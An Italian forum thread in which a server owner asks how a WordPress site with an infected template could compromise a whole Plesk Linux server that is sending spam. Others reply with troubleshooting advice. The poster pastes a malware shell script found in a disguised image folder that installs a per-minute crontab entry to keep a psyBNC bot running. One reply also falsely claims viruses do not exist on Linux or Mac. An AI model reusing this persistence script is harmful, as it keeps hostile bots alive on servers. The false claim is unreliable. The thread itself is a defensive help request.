- Home
- Categorie
- Coding e Sistemistica
- Hosting, Server e Domini
- problema virus nel server linux
-
problema virus nel server linux
ciao a tutti da qualche giorno dal mio server linux (con pannello plesk) partono un sacco di email, ho chiesto al mio sistemista da cosa potrebbe essere causato il problema e mi ha detto che il problema e causato da un sito presente sul mio server che e infetto di virus ed ha uno script malevolo, questo perchè su questo sito è stato installato un template wordpress che aveva gia di suo questi virus, adesso mi ha detto il sistemista che a causa di questo sito è stato infettato tutto il server, quello che mi chiedo, e possibile? anche perche il proprietario del sito infetto non ha accesso al server come super amministratore, come può un sito appoggiato sul mio server, infettare tutto il sistema?
-
Ciao, spero che tu abbia solamente riportato male quello che ti ha detto il tuo sistemista, perché su Linux non esistono i virus. Neppure su Mac che è un altro sistema Unix.
Se invece il tuo sistemista ha parlato di virus allora forse è meglio che cambi.
M.
-
Andrebbe fatta un'analisi approfondita. Quello che dice il tuo sistemista è possibile ma assai remoto. Partire di uno script php malevolo e arrivare ad un server con un rootkit installato è decisamente rocambolesco. Piuttosto avete individuato lo script malevolo? E' stato rimosso? E' stata fatta un'analisi con rkhunter e similari?
Intanto puoi fare ( o lo fai fare al sistemista ) un controllo per vedere quali processi sono coinvolti nell'invio delle email. E siete sicuri che le email partano da quel server? Spesso i cybercriminali usano indirizzi email forgiati che rimandano a soggetti estranei. Non so cosa avete scoperto e quali dati avete in mano, ma le possibilità possono essere parecchie.
-
mi ha detto il sistemista che ha già fatto una scansione con qualcosa di simile a rkhunter ma il problema non era individuabile tramite queto genere di applicazioni, mi ha fatto vedere anche il percorso dello script malevolo che si trova in questo percorso: /var/www/vhosts/svaporium.com/httpdocs/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/3 ad esempio uno dei file presenti in questo percorso si chiama fuck e contiene questo codice
#!/bin/sh
pwd > ssstt.dir
dir=$(cat ssstt.dir)
echo "* * * * * $dir/y2kupdate >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep y2kupdate
echo "#!/bin/sh
if test -r $dir/psybnc.pid; then
pid=$(cat $dir/psybnc.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./run &>/dev/null" > y2kupdate
chmod u+x y2kupdate
-
E' un malware noto e si tratta di un bot. L'unica cosa da fare è procedere a scovarlo ed eliminarlo, altrimenti puoi fare una formattazione se provi non si riesce in tempi ragionevoli a ripristinare il sistema.
Ovviamente se hai a disposizione immagini di backup il problema si risolve ancora più facilmente.
-
vi ringrazio, credo che il sistemista sa già dove mettere le mani, mi sembra sicuro di se, dubitavo della sua bravura dato che si tratta di un ragazzino di 16 anni.